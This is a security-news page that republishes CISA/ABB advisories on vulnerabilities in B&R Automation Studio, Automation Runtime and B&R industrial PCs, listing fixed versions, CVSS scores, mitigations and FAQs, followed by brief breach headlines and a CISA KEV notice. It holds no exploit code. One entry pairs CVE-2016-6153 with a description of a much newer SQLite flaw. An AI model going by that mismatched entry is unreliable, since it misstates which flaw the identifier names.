View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-190 Integer Overflow or Wraparound Metrics CVSS Version Base Score Base Severity Vector String 3.0 8.1 HIGH CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C CVE-2018-8740 In SQLite through 3.22.0, databases whose schema is corrupted using a CREATE TABLE AS statement could cause a NULL pointer dereference, related to build.c and prepare.c. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. 
Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.0 7.5 HIGH CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C CVE-2017-10989 The getNodeSize function in ext/rtree/rtree.c in SQLite through 3.19.3, as used in GDAL and other products, mis-handles undersized RTree blobs in a crafted database, leading to a heap-based buffer over-read or possibly un-specified other impact. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.0 9.8 CRITICAL CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C CVE-2016-6153 There exists a vulnerability in SQLite versions before 3.50.2 where the number of aggregate terms could exceed the number of columns available. This could lead to a memory corruption issue. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. 
Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.0 5.9 MEDIUM CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C CVE-2015-6607 SQLite before 3.8.9, as used in Android before 5.1.1 LMY48T, allows attackers to gain privileges via a crafted application, aka internal bug 20099586. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-286 Incorrect User Management Metrics CVSS Version Base Score Base Severity Vector String 3.0 3.7 LOW CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:P/RL:O/RC:C CVE-2015-5895 Multiple unspecified vulnerabilities in SQLite before 3.8.10.2, as used in Apple iOS before 9, have unknown im-pact and attack vectors. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. 
Relevant CWE: CWE-200 Exposure of Sensitive Information to an Unauthorized Actor Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C CVE-2015-3717 Multiple buffer overflows in the printf functionality in SQLite, as used in Apple iOS before 8.4 and OS X before 10.10.4, allow remote attackers to execute arbitrary code or cause a denial of service (application crash) via un-specified vectors. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') Metrics CVSS Version Base Score Base Severity Vector String 3.0 7.5 HIGH CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C CVE-2015-3416 The sqlite3VXPrintf function in printf.c in SQLite before 3.8.9 does not properly handle precision and width values during floating-point conversions, which allows context-dependent attackers to cause a denial of service (integer overflow and stack-based buffer overflow) or possibly have unspecified other impact via large integers in a crafted printf function call in a SELECT statement. 
View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-190 Integer Overflow or Wraparound Metrics CVSS Version Base Score Base Severity Vector String 3.0 7.8 HIGH CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C Acknowledgments ABB PSIRT reported these vulnerabilities to CISA. Notice The information in this document is subject to change without notice, and should not be construed as a commitment by B&R. B&R provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall B&R or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if B&R or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from B&R, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners. 
Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of ABB PSIRT SA25P007 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. 
This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-02-18 Date Revision Summary 2026-02-18 1 Initial version. 2026-05-21 2 Initial CISA Republication of ABB PSIRT SA25P007 advisory Legal Notice and Terms of Use

ABB B&R Automation Runtime

Summary
An update is available that resolves a vulnerability identified by B&R's internal security analysis in the product versions listed as affected in this advisory. An attacker who successfully exploited these vulnerabilities could take over a remote session or execute code in the context of the user’s browser session.
The following versions of ABB B&R Automation Runtime are affected:
Automation Runtime <6.4, 6.4 (CVE-2025-3449, CVE-2025-3448, CVE-2025-11498)

CVSS v3: 6.1
Vendor: B&R
Equipment: ABB B&R Automation Runtime
Vulnerabilities: Generation of Predictable Numbers or Identifiers, Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), Improper Neutralization of Formula Elements in a CSV File

Background
Critical Infrastructure Sectors: Energy
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Switzerland

Vulnerabilities

The affected product and remediation information is identical for all three CVEs in this advisory and is therefore listed once:

Affected Products
ABB B&R Automation Runtime
Vendor: B&R
Product Version: Automation Runtime <6.4
Product Status: fixed, known_affected

Remediations
Vendor fix: The problem is corrected in Automation Runtime 6.4. The System Diagnostic Manager (SDM) is disabled by default in Automation Runtime 6 and is not intended to be enabled on active systems located outside properly secured production networks or in facilities lacking adequate physical and logical access controls to prevent any form of unauthorized interaction. For customers who use SDM on their systems, B&R recommends applying the update based on risk assessment at the earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual.

CVE-2025-3449
A Generation of Predictable Numbers or Identifiers vulnerability in the SDM component of B&R Automation Runtime versions before 6.4 may allow an unauthenticated network-based attacker to take over already established sessions.
Relevant CWE: CWE-340 Generation of Predictable Numbers or Identifiers
Metrics: CVSS 3.1, Base Score 4.2, Base Severity MEDIUM, Vector String CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N/E:F/RL:O/RC:C

CVE-2025-3448
Reflected cross-site scripting (XSS) vulnerabilities exist in System Diagnostics Manager (SDM) of B&R Automation Runtime versions before 6.4 that enable a remote attacker to execute arbitrary JavaScript code in the context of the attacked user’s browser session.
Relevant CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Metrics: CVSS 3.1, Base Score 6.1, Base Severity MEDIUM, Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:F/RC:C

CVE-2025-11498
An Improper Neutralization of Formula Elements in a CSV File vulnerability exists in System Diagnostics Manager (SDM) of B&R Automation Runtime versions before 6.4, enabling a remote attacker to inject formula data into a generated CSV file. The exploitation of this vulnerability requires the attacker to create a malicious link. The user would need to click on this link, after which the resulting CSV file additionally needs to be manually opened.
Relevant CWE: CWE-1236 Improper Neutralization of Formula Elements in a CSV File
Metrics: CVSS 3.1, Base Score 6.1, Base Severity MEDIUM, Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/RL:O/RC:C

Acknowledgments
ABB PSIRT reported these vulnerabilities to CISA.

Notice
The information in this document is subject to change without notice, and should not be construed as a commitment by B&R. B&R provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall B&R or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if B&R or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from B&R, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners.

Mitigating factors
Do not enable the System Diagnostics Manager when it is not required. Refer to section “General security recommendations” for further advice on how to keep your system secure.

Workarounds
Do not use hyperlinks provided by untrusted third parties to access the SDM. Hyperlinks may be provided via:
• Emails from unknown users
• Social media channels
• Messaging services
• Webpages with comment functionality
• QR Codes
The use of external Web Application Firewalls (WAF) can mitigate attacks using reflected cross-site scripting.

Frequently asked questions
What causes the vulnerabilities?
The vulnerabilities are caused by insufficient input sanitization and generation of predictable numbers.
What is System Diagnostics Manager (SDM)?
System Diagnostics Manager (SDM) is a webpage available over the Automation Runtime Webserver, showing key diagnostic information of the running controller.
What is Automation Runtime (AR)?
B&R Automation Runtime is a middleware system enabling customers to run applications on B&R target systems.
What might an attacker use the vulnerabilities to do?
An attacker who successfully exploited these vulnerabilities could run arbitrary code in the context of the user’s browser session or take over the user’s session. Since the SDM currently does not process any session-specific data and also does not implement authentication mechanisms at the session level, B&R is not aware of any advantages an attacker could gain by taking over the session ID.
How could an attacker exploit the vulnerabilities?
To exploit the XSS vulnerability CVE-2025-3448, an attacker could try to create a hyperlink including malicious script code. This hyperlink must be opened by the user to launch the attack. To exploit vulnerability CVE-2025-3449, an attacker would need to guess a user's session ID.
Could the vulnerabilities be exploited remotely?
Yes, an attacker who has network access to an affected system node could exploit this vulnerability. Recommended practices include that process control systems are physically protected, have no direct connections to the Internet, and are separated from other networks by means of a firewall system that has a minimal number of ports exposed.
When this security advisory was issued, had this vulnerability been publicly disclosed?
No, B&R discovered the vulnerabilities through its own security analysis.
When this security advisory was issued, had B&R received any reports that this vulnerability was being exploited?
No, B&R had not received any information indicating that this vulnerability had been exploited when this security advisory was originally issued.

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices.
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory Conversion Disclaimer
This ICSA is a verbatim republication of ABB PSIRT SA25P003 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory.

Revision History
Initial Release Date: 2025-10-07
2025-10-07, Revision 1: Initial version.
2025-10-14, Revision 2: Added information about CVE-2025-11498
2026-05-21, Revision 3: Initial CISA Republication of ABB PSIRT SA25P003 advisory

0
ABB B&R PCs

Summary

ABB became aware of vulnerabilities in the product versions listed as affected in the advisory. An update is now available that addresses and remediates the vulnerabilities. A network attacker could exploit the vulnerabilities to execute remote code, initiate DoS attacks, conduct DNS cache poisoning, or extract sensitive information.

The following versions of ABB B&R PCs are affected, each by CVE-2023-45229, CVE-2023-45230, CVE-2023-45231, CVE-2023-45232, CVE-2023-45233, CVE-2023-45234, CVE-2023-45235, CVE-2023-45236 and CVE-2023-45237:
- APC4100 <1.09, 1.09
- APC910 <=1.25
- C80 <1.14, 1.14
- MPC3100 <1.24, 1.24
- PPC1200 <1.14, 1.14
- PPC900 <2.16, 2.16
- APC2200 <1.35, 1.35
- PPC2200 <1.35, 1.35
- APC3100 <1.45, 1.45
- PPC3100 <1.45, 1.45

CVSS v3: 8.3
Vendor: ABB
Equipment: ABB B&R PCs
Vulnerabilities: Out-of-bounds Read, Improper Restriction of Operations within the Bounds of a Memory Buffer, Loop with Unreachable Exit Condition ('Infinite Loop'), Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)

Background

Critical Infrastructure Sectors: Energy
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Switzerland

Vulnerabilities

CVE-2023-45229

EDK2's Network Package is susceptible to an out-of-bounds read vulnerability when processing the IA_NA or IA_TA option in a DHCPv6 Advertise message. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality.

Affected Products: ABB B&R PCs
Vendor: ABB
Product Version: ABB APC4100 <1.09, ABB APC910 <=1.25, ABB C80 <1.14, ABB MPC3100 <1.24, ABB PPC1200 <1.14, ABB PPC900 <2.16, ABB APC2200 <1.35, ABB PPC2200 <1.35, ABB APC3100 <1.45, ABB PPC3100 <1.45
Product Status: fixed, known_affected

Remediations

Vendor fix: The problems are corrected in the following product versions:
- APC4100 1.09
- APC910: No patch will be released (please refer to the mitigation measures specified in this advisory).
- C80 1.14
- MPC3100 1.24
- PPC1200 1.14
- PPC900 2.16
- APC2200 1.35
- PPC2200 1.35
- APC3100 1.45
- PPC3100 1.45

B&R recommends that customers apply the update at their earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual.

Mitigation

Deactivate the vulnerable component: The vulnerabilities exist in the Preboot eXecution Environment (PXE) of the UEFI firmware. If this functionality is not needed, it is recommended to disable it in the UEFI settings, thus making the vulnerabilities not exploitable.

Limit accessibility: If PXE functionality is required, users should tightly restrict network traffic to legitimate users and block illegitimate PXE traffic, specifically related to IPv6, for instance by blocking IPv6 network traffic on the control network firewall. See https://help.br-automation.com/#/en/6/cyber-security/defense-in-depth-for-br-products/reference_architecture.html and refer to section “General security recommendations” for further advice on how to keep your system secure.

Relevant CWE: CWE-125 Out-of-bounds Read
Metrics: CVSS v3.1 base score 6.5 (MEDIUM), vector CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P/RL:O/RC:C

CVE-2023-45230

EDK2's Network Package is susceptible to a buffer overflow vulnerability via a long server ID option in DHCPv6 client. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality, Integrity and/or Availability.

Affected products, remediations and mitigation: identical to those listed under CVE-2023-45229 above.
Relevant CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
Metrics: CVSS v3.1 base score 8.3 (HIGH), vector CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H/E:P/RL:O/RC:C

CVE-2023-45231

EDK2's Network Package is susceptible to an out-of-bounds read vulnerability when processing a Neighbor Discovery Redirect message. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality.

Affected products, remediations and mitigation: identical to those listed under CVE-2023-45229 above.
Relevant CWE: CWE-125 Out-of-bounds Read
Metrics: CVSS v3.1 base score 6.5 (MEDIUM), vector CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P/RL:O/RC:C

CVE-2023-45232

EDK2's Network Package is susceptible to an infinite loop vulnerability when parsing unknown options in the Destination Options header of IPv6. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Availability.

Affected products, remediations and mitigation: identical to those listed under CVE-2023-45229 above.
Relevant CWE: CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
Metrics: CVSS v3.1 base score 7.5 (HIGH), vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C

CVE-2023-45233

EDK2's Network Package is susceptible to an infinite loop vulnerability when parsing a PadN option in the Destination Options header of IPv6. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Availability.

Affected products, remediations and mitigation: identical to those listed under CVE-2023-45229 above.
Relevant CWE: CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
Metrics: CVSS v3.1 base score 7.5 (HIGH), vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C

CVE-2023-45234

EDK2's Network Package is susceptible to a buffer overflow vulnerability when processing the DNS Servers option from a DHCPv6 Advertise message. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality, Integrity and/or Availability.

Affected products, remediations and mitigation: identical to those listed under CVE-2023-45229 above.
Relevant CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
Metrics: CVSS v3.1 base score 8.3 (HIGH), vector CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H/E:P/RL:O/RC:C

CVE-2023-45235

EDK2's Network Package is susceptible to a buffer overflow vulnerability when handling the Server ID option from a DHCPv6 proxy Advertise message. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality, Integrity and/or Availability.

Affected products, remediations and mitigation: identical to those listed under CVE-2023-45229 above.
Relevant CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
Metrics: CVSS v3.1 base score 8.3 (HIGH), vector CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H/E:P/RL:O/RC:C

CVE-2023-45236

EDK2's Network Package is susceptible to a predictable TCP Initial Sequence Number. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality.

Affected products, remediations and mitigation: identical to those listed under CVE-2023-45229 above.
Relevant CWE: CWE-338 Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)
Metrics: CVSS v3.1 base score 5.8 (MEDIUM), vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N/E:P/RL:O/RC:C

CVE-2023-45237

EDK2's Network Package is susceptible to a predictable TCP Initial Sequence Number. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality.

Affected products, remediations and mitigation: identical to those listed under CVE-2023-45229 above.
Relevant CWE: CWE-338 Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)
Metrics: CVSS v3.1 base score 5.3 (MEDIUM), vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:P/RL:O/RC:C

Acknowledgments

ABB PSIRT reported these vulnerabilities to CISA.

Notice

The information in this document is subject to change without notice, and should not be construed as a commitment by B&R. B&R provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall B&R or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if B&R or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from B&R, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners.

Frequently Asked Questions

What is the scope of the vulnerabilities?
A network attacker who successfully exploited these vulnerabilities could execute remote code, initiate DoS attacks, conduct DNS cache poisoning, or extract sensitive information.
In the worst case, these vulnerabilities can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality, Integrity and/or Availability.

What causes the vulnerabilities?
The vulnerabilities are caused by usage of vulnerable UEFI firmware in some B&R xPCs.

What is a B&R xPC?
A B&R xPC is an industrial PC (IPC) designed for use in industrial environments and is built to handle more demanding conditions than a standard PC. They often feature robust construction, resistance to dust and moisture, extended temperature ranges, and other specifications suited for industrial applications.

What might an attacker use the vulnerabilities to do?
A network attacker who successfully exploited the vulnerabilities could execute remote code, initiate DoS attacks, conduct DNS cache poisoning, or extract sensitive information.

How could an attacker exploit the vulnerabilities?
An attacker could try to exploit the vulnerabilities by creating a specially crafted message and sending the message to an affected system node. This would require that the attacker has access to the system network, by connecting to the network either directly or through a wrongly configured or penetrated firewall, or that he installs malicious software on a system node or otherwise infects the network with malicious software. Recommended practices help mitigate such attacks, see section Mitigating Factors above.

Could the vulnerabilities be exploited remotely?
Yes, an attacker who has network access to an affected system node could exploit this vulnerability. Recommended practices include that process control systems are physically protected, have no direct connections to the Internet, and are separated from other networks by means of a firewall system that has a minimal number of ports exposed.

What does the update do?
The update removes the vulnerabilities in the TCP/IP stack used by the UEFI firmware.

When this security advisory was issued, had these vulnerabilities been publicly disclosed?
Yes, these vulnerabilities have been publicly disclosed.

When this security advisory was issued, had B&R received any reports that this vulnerability was being exploited on B&R products?
No, B&R had not received any information indicating that this vulnerability had been exploited on B&R products when this security advisory was originally issued.

Legal Notice and Terms of Use

This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices

CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability.
- Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.
- Locate control system networks and remote devices behind firewalls and isolate them from business networks.
- When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory Conversion Disclaimer

This ICSA is a verbatim republication of ABB PSIRT SA24P003 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory.

Revision History

Initial Release Date: 2026-01-29

Date        Revision  Summary
2026-01-29  1         Initial version.
2026-05-21  2         Initial CISA Republication of ABB PSIRT SA24P003 advisory

0
Microsoft warns of new Defender zero-days exploited in attacks

On Wednesday, Microsoft started rolling out security patches for two Defender vulnerabilities that have been exploited in zero-day attacks. [...]

0
GitHub links repo breach to TanStack npm supply-chain attack

GitHub says the hackers who breached 3,800 internal repositories gained access via a malicious version of the Nx Console VS Code extension, compromised in last week's TanStack npm supply-chain attack. [...]

0
Map Protocol token plummets 96% after a quadrillion token mint exploit

The attacker tricked the Butter Network cross-chain bridge into minting millions more tokens than the legitimate supply of MAPO.

0
Ukraine identifies infostealer operator tied to 28,000 stolen accounts

The Ukrainian cyberpolice, working in conjunction with U.S. law enforcement, has identified an 18-year-old man from Odesa suspected of running an infostealer malware operation targeting users of an online store in California. [...]

0
Hackers bypass SonicWall VPN MFA due to incomplete patching

Threat actors brute-forced VPN credentials and bypassed multi-factor authentication (MFA) on SonicWall Gen6 SSL-VPN appliances to deploy tools used in ransomware attacks. [...]

0
GitHub Confirms Breach, 4K Internal Repos Stolen

GitHub confirmed a data breach this week involving the theft of thousands of developer code repositories. One threat actor — TeamPCP — took credit.

0
Processes & Culture Top Reasons Behind Data Breaches

In spite of state laws meant to improve cyber hygiene, an analysis of incidents shows issues persist and visibility falls short.

0
Patch Now: Critical Flaw in OT Robot OS Gives Attackers Control

An unauthenticated attacker can exploit the command injection vulnerability to gain remote access to robotic systems, causing significant disruption to the environment.

0
Grafana breach caused by missed token rotation after TanStack attack

The Grafana data breach was caused by a single GitHub workflow token that slipped through the rotation process following the TanStack npm supply-chain attack last week. [...]

0
Identity Alone Isn't Enough: Why Device Security Has to Share the Load

Identity checks alone can't stop attackers using stolen session tokens and compromised devices. Specops Software outlines why Zero Trust strategies increasingly depend on continuous device verification. [...]

0
Drupal critical update to fix bug with high exploitation risk

Drupal has announced a "core security release" scheduled for later today, warning that threat actors might develop exploits within hours of the update disclosure. [...]

CISA Adds Seven Known Exploited Vulnerabilities to Catalog

CISA has added seven new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation:

CVE-2008-4250 Microsoft Windows Buffer Overflow Vulnerability
CVE-2009-1537 Microsoft DirectX NULL Byte Overwrite Vulnerability
CVE-2009-3459 Adobe Acrobat and Reader Heap-Based Buffer Overflow Vulnerability
CVE-2010-0249 Microsoft Internet Explorer Use-After-Free Vulnerability
CVE-2010-0806 Microsoft Internet Explorer Use-After-Free Vulnerability
CVE-2026-41091 Microsoft Defender Elevation of Privilege Vulnerability
CVE-2026-45498 Microsoft Defender Denial of Service Vulnerability

These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

Exploit released for new PinTheft Arch Linux root escalation flaw

PinTheft, a recently patched Linux privilege escalation vulnerability, now has a publicly available proof-of-concept (PoC) exploit that allows local attackers to gain root privileges on Arch Linux systems. [...]

